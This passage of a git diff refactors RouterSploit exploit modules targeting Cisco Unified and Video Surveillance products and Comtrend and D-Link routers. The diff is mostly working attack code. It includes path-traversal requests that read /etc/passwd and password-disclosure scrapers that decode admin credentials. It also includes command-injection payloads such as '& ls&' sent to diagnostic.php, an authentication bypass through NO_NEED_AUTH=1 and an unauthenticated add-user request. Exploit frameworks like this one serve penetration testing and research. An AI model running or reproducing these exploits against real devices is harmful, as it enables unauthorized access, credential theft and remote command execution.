Cisco Unified IP Interactive Voice Response devices.' - 'If the target is vulnerable it allows to read files from the filesystem.', - 'authors': [ - 'Facundo M. de la Cruz (tty0) ', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "Cisco Unified Multi Path Traversal", + "description": "Module exploits path traversal vulnerability in Cisco Unified Communications Manager, " + "Cisco Unified Contact Center Express and Cisco Unified IP Interactive Voice Response devices." + "If the target is vulnerable it allows to read files from the filesystem.", + "authors": [ + "Facundo M. de la Cruz (tty0) ", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://www.exploit-db.com/exploits/36256/', - 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3315', + "references": [ + "https://www.exploit-db.com/exploits/36256/", + "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3315", ], - 'devices': [ - 'Cisco Unified Communications Manager 5.x', - 'Cisco Unified Communications Manager 6.x < 6.1(5)', - 'Cisco Unified Communications Manager 7.x < 7.1(5b)', - 'Cisco Unified Communications Manager 8.x < 8.0(3)', - 'Cisco Unified Contact Center Express', - 'Cisco Unified IP Interactive Voice Response < 6.0(1)', - 'Cisco Unified IP Interactive Voice Response 7.0(x) < 7.0(2)', - 'Cisco Unified IP Interactive Voice Response 8.0(x) < 8.5(1)', + "devices": [ + "Cisco Unified Communications Manager 5.x", + "Cisco Unified Communications Manager 6.x < 6.1(5)", + "Cisco Unified Communications Manager 7.x < 7.1(5b)", + "Cisco Unified Communications Manager 8.x < 8.0(3)", + "Cisco Unified Contact Center Express", + "Cisco Unified IP Interactive Voice Response < 6.0(1)", + "Cisco Unified IP Interactive Voice Response 7.0(x) < 7.0(2)", + "Cisco Unified IP Interactive Voice Response 8.0(x) < 8.5(1)", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(80, 'Target Port') - filename = exploits.Option('/etc/passwd', 'File to read from the filesystem') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") + filename = OptString("/etc/passwd", 'File to read from the filesystem') def run(self): if self.check(): - url = "{}:{}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../..{}".format(self.target, self.port, self.filename) + path = "/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../..{}".format(self.filename) - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path=path + ) if response is None: return @@ -62,13 +53,16 @@ def run(self): @mute def check(self): - url = "{}:{}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd".format(self.target, self.port) + path = "/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd" - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path=path + ) if response is None: return False # target is not vulnerable - if response.status_code == 200 and "admin:" in response.text: + if response.status_code == 200 and utils.detect_file_content(response.text, "/etc/passwd"): return True # target is vulnerable return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/cisco/video_surv_path_traversal.py b/routersploit/modules/exploits/routers/cisco/video_surv_path_traversal.py index 29a4ecfcb..d6528399d 100644 --- a/routersploit/modules/exploits/routers/cisco/video_surv_path_traversal.py +++ b/routersploit/modules/exploits/routers/cisco/video_surv_path_traversal.py @@ -1,45 +1,37 @@ -from routersploit import ( - exploits, - print_success, - print_status, - print_error, - print_info, - http_request, - mute, - validators, -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for Path Traversal vulnerability in Cisco Video Surveillance Operations Manager 6.3.2 devices. - If the target is vulnerable, it allows to read files from the filesystem. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Cisco Video Surveillance Path Traversal', - 'description': 'Module exploits path traversal vulnerability in Cisco Video Surveillance Operations Manager 6.3.2 devices.' - 'If the target is vulnerable it allows to read files from the filesystem.', - 'authors': [ - 'b.saleh', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "Cisco Video Surveillance Path Traversal", + "description": "Module exploits path traversal vulnerability in Cisco Video Surveillance Operations Manager 6.3.2 devices. " + "If the target is vulnerable it allows to read files from the filesystem.", + "authors": [ + "b.saleh", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://www.exploit-db.com/exploits/38389/', + "references": [ + "https://www.exploit-db.com/exploits/38389/", ], - 'devices': [ - 'Cisco Video Surveillance Operations Manager 6.3.2', + "devices": [ + "Cisco Video Surveillance Operations Manager 6.3.2", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(80, 'Target Port') - filename = exploits.Option('/etc/passwd', 'File to read from the filesystem') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") + + filename = OptString("/etc/passwd", "File to read from the filesystem") def run(self): if self.check(): - url = "{}:{}/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../..{}".format(self.target, self.port, self.filename) + path = "/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../..{}".format(self.filename) - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path=path + ) if response is None: return @@ -54,13 +46,16 @@ def run(self): @mute def check(self): - url = "{}:{}/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/passwd".format(self.target, self.port) + path = "/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/passwd" - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path=path + ) if response is None: return False # target is not vulnerable - if response.status_code == 200 and "admin:" in response.text: + if response.status_code == 200 and utils.detect_file_content(response.text, "/etc/passwd"): return True # target is vulnerable return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/comtrend/ct_5361t_password_disclosure.py b/routersploit/modules/exploits/routers/comtrend/ct_5361t_password_disclosure.py index a266691e0..3c4bb16d8 100644 --- a/routersploit/modules/exploits/routers/comtrend/ct_5361t_password_disclosure.py +++ b/routersploit/modules/exploits/routers/comtrend/ct_5361t_password_disclosure.py @@ -1,60 +1,49 @@ -from base64 import b64decode import re - -from routersploit import ( - exploits, - print_info, - print_error, - print_status, - print_success, - print_table, - http_request, - mute, - validators, -) +from base64 import b64decode +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for Comtrend CT-5361T Password Disclosure vulnerability. - If the target is vulnerable it allows to read credentials for admin, support and user." - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Comtrend CT 5361T Password Disclosure', - 'description': 'WiFi router Comtrend CT 5361T suffers from a Password Disclosure Vulnerability', - 'authors': [ - 'TUNISIAN CYBER', # routersploit module + "name": "Comtrend CT 5361T Password Disclosure", + "description": "WiFi router Comtrend CT 5361T suffers from a Password Disclosure Vulnerability", + "authors": [ + "TUNISIAN CYBER", # routersploit module ], - 'references': [ - 'https://packetstormsecurity.com/files/126129/Comtrend-CT-5361T-Password-Disclosure.html' + "references": [ + "https://packetstormsecurity.com/files/126129/Comtrend-CT-5361T-Password-Disclosure.html" ], - 'devices': [ - 'Comtrend CT 5361T (more likely CT 536X)', + "devices": [ + "Comtrend CT 5361T (more likely CT 536X)", ] } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): if self.check(): - url = "{}:{}/password.cgi".format(self.target, self.port) - print_status("Requesting for {}".format(url)) - - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/password.cgi", + ) if response is None: return - regexps = [("admin", "pwdAdmin = '(.+?)'"), - ("support", "pwdSupport = '(.+?)'"), - ("user", "pwdUser = '(.+?)'")] + regexps = [ + ("admin", "pwdAdmin = '(.+?)'"), + ("support", "pwdSupport = '(.+?)'"), + ("user", "pwdUser = '(.+?)'") + ] creds = [] for regexp in regexps: res = re.findall(regexp[1], response.text) - if len(res): - creds.append((regexp[0], b64decode(res[0]))) + if res: + value = str(b64decode(res[0]), "utf-8") + creds.append((regexp[0], value)) if len(creds): print_success("Credentials found!") @@ -68,9 +57,11 @@ def run(self): @mute def check(self): - url = "{}:{}/password.cgi".format(self.target, self.port) + response = self.http_request( + method="GET", + path="/password.cgi", + ) - response = http_request(method="GET", url=url) if response is None: return False # target is not vulnerable @@ -84,7 +75,7 @@ def check(self): if len(res): try: b64decode(res[0]) # checking if data is base64 encoded - except Exception: + except: return False # target is not vulnerable else: return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/dlink/dcs_930l_auth_rce.py b/routersploit/modules/exploits/routers/dlink/dcs_930l_auth_rce.py index b214d54c9..24a7b106b 100644 --- a/routersploit/modules/exploits/routers/dlink/dcs_930l_auth_rce.py +++ b/routersploit/modules/exploits/routers/dlink/dcs_930l_auth_rce.py @@ -1,39 +1,28 @@ -from routersploit import ( - exploits, - print_success, - print_status, - print_error, - http_request, - mute, - validators, - shell, -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for D-Link DCS-930L Remote Code Execution vulnerability. - If the target is vulnerable, command loop is invoked that allows executing commands on the device. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'D-Link DCS-930L Auth RCE', - 'description': 'Module exploits D-Link DCS-930L Remote Code Execution vulnerability which allows executing command on the device.', - 'authors': [ - 'Nicholas Starke ', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "D-Link DCS-930L Auth RCE", + "description": "Module exploits D-Link DCS-930L Remote Code Execution vulnerability which allows executing command on the device.", + "authors": [ + "Nicholas Starke ", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://www.exploit-db.com/exploits/39437/', + "references": [ + "https://www.exploit-db.com/exploits/39437/", ], - 'devices': [ - 'D-Link DCS-930L', + "devices": [ + "D-Link DCS-930L", ] } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(80, 'Target Port') - username = exploits.Option('admin', 'Username to log in with') - password = exploits.Option('', 'Password to log in with') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") + + username = OptString("admin", "Username to log in with") + password = OptString("", "Password to log in with") def run(self): if self.check(): @@ -45,26 +34,42 @@ def run(self): print_error("Exploit failed - target seems to be not vulnerable") def execute(self, cmd): - url = "{}:{}/setSystemCommand".format(self.target, self.port) headers = {"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"} - data = {"ReplySuccessPage": "docmd.htm", - "ReplyErrorPage": "docmd.htm", - "SystemCommand": cmd, - "ConfigSystemCommand": "Save"} + data = { + "ReplySuccessPage": "docmd.htm", + "ReplyErrorPage": "docmd.htm", + "SystemCommand": cmd, + "ConfigSystemCommand": "Save" + } + + self.http_request( + method="POST", + path="/setSystemCommand", + headers=headers, + data=data, + auth=(self.username, self.password) + ) - http_request(method="POST", url=url, headers=headers, data=data, auth=(self.username, self.password)) return "" @mute def check(self): - url = "{}:{}/setSystemCommand".format(self.target, self.port) headers = {"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"} - data = {"ReplySuccessPage": "docmd.htm", - "ReplyErrorPage": "docmd.htm", - "SystemCommand": "ls", - "ConfigSystemCommand": "Save"} + data = { + "ReplySuccessPage": "docmd.htm", + "ReplyErrorPage": "docmd.htm", + "SystemCommand": "ls", + "ConfigSystemCommand": "Save" + } + + response = self.http_request( + method="POST", + path="/setSystemCommand", + headers=headers, + data=data, + auth=(self.username, self.password), + ) - response = http_request(method="POST", url=url, headers=headers, data=data, auth=(self.username, self.password)) if response is None: return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/dlink/dgs_1510_add_user.py b/routersploit/modules/exploits/routers/dlink/dgs_1510_add_user.py index dcc73c1cd..050b6d9c6 100644 --- a/routersploit/modules/exploits/routers/dlink/dgs_1510_add_user.py +++ b/routersploit/modules/exploits/routers/dlink/dgs_1510_add_user.py @@ -2,54 +2,42 @@ import gzip import zlib from StringIO import StringIO -from routersploit import ( - exploits, - print_error, - print_status, - print_success, - print_table, - http_request, - mute, - validators -) - - -class Exploit(exploits.Exploit): - """ - D-Link DGS-1510-28XMP, DGS-1510-28X, DGS-1510-52X, DGS-1510-52, - DGS-1510-28P, DGS-1510-28, and DGS-1510-20 Websmart devices with firmware - before 1.31.B003 allow attackers to conduct Unauthenticated Information Disclosure - attacks via unspecified vectors. - """ +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient + + +class Exploit(HTTPClient): __info__ = { - 'name': 'D-Link DGS-1510 Add User', - 'description': 'D-Link DGS-1510-28XMP, DGS-1510-28X, DGS-1510-52X, DGS-1510-52, DGS-1510-28P, DGS-1510-28 and DGS-1510-20 ' - 'Websmart devices with firmware before 1.31.B003 allow attackers to conduct Unauthenticated Information Disclosure ' - 'attacks via unspecified vectors.', - 'authors': [ - 'Varang Amin', # vulnerability discovery - 'Dino Causevic' # routersploit module + "name": "D-Link DGS-1510 Add User", + "description": "D-Link DGS-1510-28XMP, DGS-1510-28X, DGS-1510-52X, DGS-1510-52, DGS-1510-28P, DGS-1510-28 and DGS-1510-20 " + "Websmart devices with firmware before 1.31.B003 allow attackers to conduct Unauthenticated Information Disclosure " + "attacks via unspecified vectors.", + "authors": [ + "Varang Amin", # vulnerability discovery + "Dino Causevic" # routersploit module ], - 'references': [ - 'https://www.exploit-db.com/exploits/41662/', + "references": [ + "https://www.exploit-db.com/exploits/41662/", ], - 'devices': [ - 'D-Link DGS-1510-28XMP', - 'D-Link DGS-1510-28X', - 'D-Link DGS-1510-52X', - 'D-Link DGS-1510-52', - 'D-Link DGS-1510-28P', - 'D-Link DGS-1510-28', - 'D-Link DGS-1510-20' + "devices": [ + "D-Link DGS-1510-28XMP", + "D-Link DGS-1510-28X", + "D-Link DGS-1510-52X", + "D-Link DGS-1510-52", + "D-Link DGS-1510-28P", + "D-Link DGS-1510-28", + "D-Link DGS-1510-20" ], } - target = exploits.Option('http://192.168.1.1', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") - username = exploits.Option('dlinkuser', 'User to add in case that user_add option is used.') - password = exploits.Option('dlinkpwd1234', 'Password for user in case that user_add option is used.') - response_content = None + username = OptString('dlinkuser', 'User to add in case that user_add option is used.') + password = OptString('dlinkpwd1234', 'Password for user in case that user_add option is used.') + + def __init__(self): + self.response_content = None def decompress(self, content, encoding): ret = content @@ -84,7 +72,6 @@ def run(self): print_table(("User Info", ), (self.response_content, )) print_status("Trying to add new user...") - url = "{}:{}/form/User_Accounts_Apply".format(self.target, self.port) data = { "action": "0", "username": self.username, @@ -106,7 +93,12 @@ def run(self): "Accept-Language": "en-US,en;q=0.8" } - response = http_request(method="POST", url=url, headers=headers, data=data) + response = self.http_request( + method="POST", + path="/form/User_Accounts_Apply", + headers=headers, + data=data + ) if response is not None: print_success("Exploit success - new user added: {} / {}".format(self.username, self.password)) @@ -119,7 +111,6 @@ def run(self): def check(self): self.response_content = None - url = "{}:{}/DataStore/990_user_account.js?index=0&pagesize=10".format(self.target, self.port) headers = { "Connection": "keep-alive", "Accept": "text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01", @@ -131,7 +122,11 @@ def check(self): "Cookie": "Language=en" } - response = http_request(method="GET", url=url, headers=headers) + response = self.http_request( + method="GET", + path="/DataStore/990_user_account.js?index=0&pagesize=10", + headers=headers + ) if response is not None and response.status_code == 200: self.response_content = self.decompress(response.content, diff --git a/routersploit/modules/exploits/routers/dlink/dir_300_320_600_615_info_disclosure.py b/routersploit/modules/exploits/routers/dlink/dir_300_320_600_615_info_disclosure.py index 82ca69753..5900dc471 100644 --- a/routersploit/modules/exploits/routers/dlink/dir_300_320_600_615_info_disclosure.py +++ b/routersploit/modules/exploits/routers/dlink/dir_300_320_600_615_info_disclosure.py @@ -1,48 +1,37 @@ import re +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -from routersploit import ( - exploits, - print_error, - print_success, - print_table, - http_request, - mute, - validators, -) - -class Exploit(exploits.Exploit): - """ - Exploit implementation for D-Link DIR-300, DIR-320, DIR-600, DIR-615 Information Disclosure vulnerability. - If the target is vulnerable it allows to read credentials for administrator." - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'D-Link DIR-300 & DIR-320 & DIR-600 & DIR-615 Info Disclosure', - 'description': 'Module explois information disclosure vulnerability in D-Link DIR-300, DIR-320, DIR-600,' - 'DIR-615 devices. It is possible to retrieve sensitive information such as credentials.', - 'authors': [ - 'tytusromekiatomek ', # vulnerability discovery - 'Marcin Bury ', # routersploit module - 'Aleksandr Mikhaylov ', # routersploit module + "name": "D-Link DIR-300 & DIR-320 & DIR-600 & DIR-615 Info Disclosure", + "description": "Module explois information disclosure vulnerability in D-Link DIR-300, DIR-320, DIR-600," + "DIR-615 devices. It is possible to retrieve sensitive information such as credentials.", + "authors": [ + "tytusromekiatomek ", # vulnerability discovery + "Marcin Bury ", # routersploit module + "Aleksandr Mikhaylov ", # routersploit module ], - 'references': [ - 'http://seclists.org/bugtraq/2013/Dec/11' + "references": [ + "http://seclists.org/bugtraq/2013/Dec/11" ], - 'devices': [ - 'D-Link DIR-300 (all)', - 'D-Link DIR-320 (all)', - 'D-Link DIR-600 (all)', - 'D-Link DIR-615 (fw 4.0)', + "devices": [ + "D-Link DIR-300 (all)", + "D-Link DIR-320 (all)", + "D-Link DIR-600 (all)", + "D-Link DIR-615 (fw 4.0)", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): - url = "{}:{}/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd".format(self.target, self.port) - - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd" + ) if response is None: return @@ -57,9 +46,10 @@ def run(self): @mute def check(self): - url = "{}:{}/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd".format(self.target, self.port) - - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd" + ) if response is None: return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/dlink/dir_300_320_615_auth_bypass.py b/routersploit/modules/exploits/routers/dlink/dir_300_320_615_auth_bypass.py index 9bb14c334..f97b24e37 100644 --- a/routersploit/modules/exploits/routers/dlink/dir_300_320_615_auth_bypass.py +++ b/routersploit/modules/exploits/routers/dlink/dir_300_320_615_auth_bypass.py @@ -1,40 +1,29 @@ -from routersploit import ( - exploits, - print_success, - print_error, - print_info, - http_request, - mute, - validators, -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for D-Link DIR-300, DIR-320, DIR-615 Authentication Bypass vulnerability. - If the target is vulnerable link to bypass authentication will be provided" - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'D-Link DIR-300 & DIR-320 & DIR-615 Auth Bypass', - 'description': 'Module exploits authentication bypass vulnerability in D-Link DIR-300, DIR-320, DIR-615' - 'revD devices. It is possible to access administration panel without providing password.', - 'authors': [ - 'Craig Heffner', # vulnerability discovery - 'Karol Celin', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "D-Link DIR-300 & DIR-320 & DIR-615 Auth Bypass", + "description": "Module exploits authentication bypass vulnerability in D-Link DIR-300, DIR-320, DIR-615 " + "revD devices. It is possible to access administration panel without providing password.", + "authors": [ + "Craig Heffner", # vulnerability discovery + "Karol Celin", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'http://www.devttys0.com/wp-content/uploads/2010/12/dlink_php_vulnerability.pdf', + "references": [ + "http://www.devttys0.com/wp-content/uploads/2010/12/dlink_php_vulnerability.pdf", ], - 'devices': [ - 'D-Link DIR-300', - 'D-Link DIR-600', - 'D-Link DIR-615 revD', + "devices": [ + "D-Link DIR-300", + "D-Link DIR-600", + "D-Link DIR-615 revD", ] } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): if self.check(): @@ -49,9 +38,10 @@ def run(self): @mute def check(self): # check if it is valid target - url = "{}:{}/bsc_lan.php".format(self.target, self.port) - - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/bsc_lan.php" + ) if response is None: return False # target is not vulnerable @@ -59,9 +49,10 @@ def check(self): return False # target is not vulnerable # checking if authentication can be baypassed - url = "{}:{}/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0".format(self.target, self.port) - - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0" + ) if response is None: return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/dlink/dir_300_600_rce.py b/routersploit/modules/exploits/routers/dlink/dir_300_600_rce.py index 677936978..16c07d45b 100644 --- a/routersploit/modules/exploits/routers/dlink/dir_300_600_rce.py +++ b/routersploit/modules/exploits/routers/dlink/dir_300_600_rce.py @@ -1,65 +1,48 @@ -from routersploit import ( - exploits, - print_error, - print_success, - print_status, - print_info, - random_text, - http_request, - mute, - validators, -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for D-Link DIR-300, DIR-600 Remote Code Execution vulnerability. - If the target is vulnerable, command loop is invoked that allows executing commands with root privileges. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'D-LINK DIR-300 & DIR-600 RCE', - 'description': 'Module exploits D-Link DIR-300, DIR-600 Remote Code Execution vulnerability which allows executing command on operating system level with root privileges.', - 'authors': [ - 'Michael Messner ', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "D-Link DIR-300 & DIR-600 RCE", + "description": "Module exploits D-Link DIR-300, DIR-600 Remote Code Execution vulnerability " + "which allows executing command on operating system level with root privileges.", + "authors": [ + "Michael Messner ", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router', - 'http://www.s3cur1ty.de/home-network-horror-days', - 'http://www.s3cur1ty.de/m1adv2013-003', + "references": [ + "http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router", + "http://www.s3cur1ty.de/home-network-horror-days", + "http://www.s3cur1ty.de/m1adv2013-003", ], - 'devices': [ - 'D-Link DIR 300', - 'D-Link DIR 600', + "devices": [ + "D-Link DIR 300", + "D-Link DIR 600", ] } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(80, 'Target Port') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): if self.check(): print_success("Target is vulnerable") print_status("Invoking command loop...") - self.command_loop() + shell(self) else: print_error("Target is not vulnerable") - def command_loop(self): - while 1: - cmd = raw_input("cmd > ") - - if cmd in ['exit', 'quit']: - return - - print_info(self.execute(cmd)) - def execute(self, cmd): - url = "{}:{}/command.php".format(self.target, self.port) - headers = {u'Content-Type': u'application/x-www-form-urlencoded'} + headers = {'Content-Type': 'application/x-www-form-urlencoded'} data = "cmd={}".format(cmd) - response = http_request(method="POST", url=url, headers=headers, data=data) + response = self.http_request( + method="POST", + path="/command.php", + headers=headers, + data=data + ) if response is None: return "" @@ -67,7 +50,7 @@ def execute(self, cmd): @mute def check(self): - mark = random_text(32) + mark = utils.random_text(32) cmd = "echo {}".format(mark) response = self.execute(cmd) diff --git a/routersploit/modules/exploits/routers/dlink/dir_300_645_815_upnp_rce.py b/routersploit/modules/exploits/routers/dlink/dir_300_645_815_upnp_rce.py index af4b11147..559dd660d 100644 --- a/routersploit/modules/exploits/routers/dlink/dir_300_645_815_upnp_rce.py +++ b/routersploit/modules/exploits/routers/dlink/dir_300_645_815_upnp_rce.py @@ -1,40 +1,29 @@ -import socket +from routersploit.core.exploit import * +from routersploit.core.udp.udp_client import UDPClient -from routersploit import ( - exploits, - print_success, - print_status, - print_error, - mute, - shell, -) - -class Exploit(exploits.Exploit): - """ - Exploit implementation for D-Link DIR-300, DIR-645 and DIR-815 UPNP Remote Code Execution vulnerability. - If the target is vulnerable, command loop is invoked that allows executing commands on the device. - """ +class Exploit(UDPClient): __info__ = { - 'name': 'D-Link DIR-300 & DIR-645 & DIR-815 UPNP RCE', - 'description': 'Module exploits D-Link DIR-300, DIR-645 and DIR-815 UPNP Remote Code Execution vulnerability which allows executing command on the device.', - 'authors': [ - 'Zachary Cutlip', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "D-Link DIR-300 & DIR-645 & DIR-815 UPNP RCE", + "description": "Module exploits D-Link DIR-300, DIR-645 and DIR-815 UPNP Remote Code Execution vulnerability which allows executing command on the device.", + "authors": [ + "Zachary Cutlip", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://github.com/zcutlip/exploit-poc/tree/master/dlink/dir-815-a1/upnp-command-injection', - 'http://shadow-file.blogspot.com/2013/02/dlink-dir-815-upnp-command-injection.html', - 'https://www.exploit-db.com/exploits/34065/', + "references": [ + "https://github.com/zcutlip/exploit-poc/tree/master/dlink/dir-815-a1/upnp-command-injection", + "http://shadow-file.blogspot.com/2013/02/dlink-dir-815-upnp-command-injection.html", + "https://www.exploit-db.com/exploits/34065/", ], - 'devices': [ - 'D-Link DIR-300', - 'D-Link DIR-645', - 'D-Link DIR-815', + "devices": [ + "D-Link DIR-300", + "D-Link DIR-645", + "D-Link DIR-815", ] } - target = exploits.Option('', 'Target IP address e.g. 192.168.1.1') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(1900, "Target UPNP port") def run(self): if self.check(): @@ -78,7 +67,7 @@ def check(self): sock.send(buf) response = sock.recv(65535) sock.close() - except Exception: + except: return False # target is not vulnerable if "Linux, UPnP/1.0, DIR-" in response: diff --git a/routersploit/modules/exploits/routers/dlink/dir_645_815_rce.py b/routersploit/modules/exploits/routers/dlink/dir_645_815_rce.py index b215df2fa..945d0acc9 100644 --- a/routersploit/modules/exploits/routers/dlink/dir_645_815_rce.py +++ b/routersploit/modules/exploits/routers/dlink/dir_645_815_rce.py @@ -1,45 +1,33 @@ -from routersploit import ( - exploits, - print_success, - print_status, - print_error, - http_request, - mute, - validators, - shell, -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for D-Link DIR-645 and DIR-815 Remote Code Execution vulnerability. - If the target is vulnerable, command loop is invoked that allows executing commands on the device. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'D-Link DIR-645 & DIR-815 RCE', - 'description': 'Module exploits D-Link DIR-645 and DIR-815 Remote Code Execution vulnerability which allows executing command on the device.', - 'authors': [ - 'Michael Messner ', # Vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "D-Link DIR-645 & DIR-815 RCE", + "description": "Module exploits D-Link DIR-645 and DIR-815 Remote Code Execution vulnerability which allows executing command on the device.", + "authors": [ + "Michael Messner ", # Vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'http://www.s3cur1ty.de/m1adv2013-017', + "references": [ + "http://www.s3cur1ty.de/m1adv2013-017", ], - 'devices': [ - 'DIR-815 v1.03b02', - 'DIR-645 v1.02', - 'DIR-645 v1.03', - 'DIR-600 below v2.16b01', - 'DIR-300 revB v2.13b01', - 'DIR-300 revB v2.14b01', - 'DIR-412 Ver 1.14WWB02', - 'DIR-456U Ver 1.00ONG', - 'DIR-110 Ver 1.01', + "devices": [ + "DIR-815 v1.03b02", + "DIR-645 v1.02", + "DIR-645 v1.03", + "DIR-600 below v2.16b01", + "DIR-300 revB v2.13b01", + "DIR-300 revB v2.14b01", + "DIR-412 Ver 1.14WWB02", + "DIR-456U Ver 1.00ONG", + "DIR-110 Ver 1.01", ] } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(80, 'Target Port') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): if self.check(): @@ -53,21 +41,29 @@ def run(self): def execute(self, cmd): cmd = "%26 {}%26".format(cmd.replace("&", "%26")) - url = "{}:{}/diagnostic.php".format(self.target, self.port) headers = {"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"} data = "act=ping&dst={}".format(cmd) - http_request(method="POST", url=url, headers=headers, data=data) + self.http_request( + method="POST", + path="/diagnostic.php", + headers=headers, + data=data + ) return "" @mute def check(self): - url = "{}:{}/diagnostic.php".format(self.target, self.port) headers = {"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"} data = {"act": "ping", "dst": "& ls&"} - response = http_request(method="POST", url=url, headers=headers, data=data) + response = self.http_request( + method="POST", + path="/diagnostic.php", + headers=headers, + data=data + ) if response is None: return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/dlink/dir_645_password_disclosure.py b/routersploit/modules/exploits/routers/dlink/dir_645_password_disclosure.py index ca5b296cf..d850b2d9e 100644 --- a/routersploit/modules/exploits/routers/dlink/dir_645_password_disclosure.py +++ b/routersploit/modules/exploits/routers/dlink/dir_645_password_disclosure.py @@ -1,46 +1,37 @@ import re +from routersploit.core.exploit import * +from 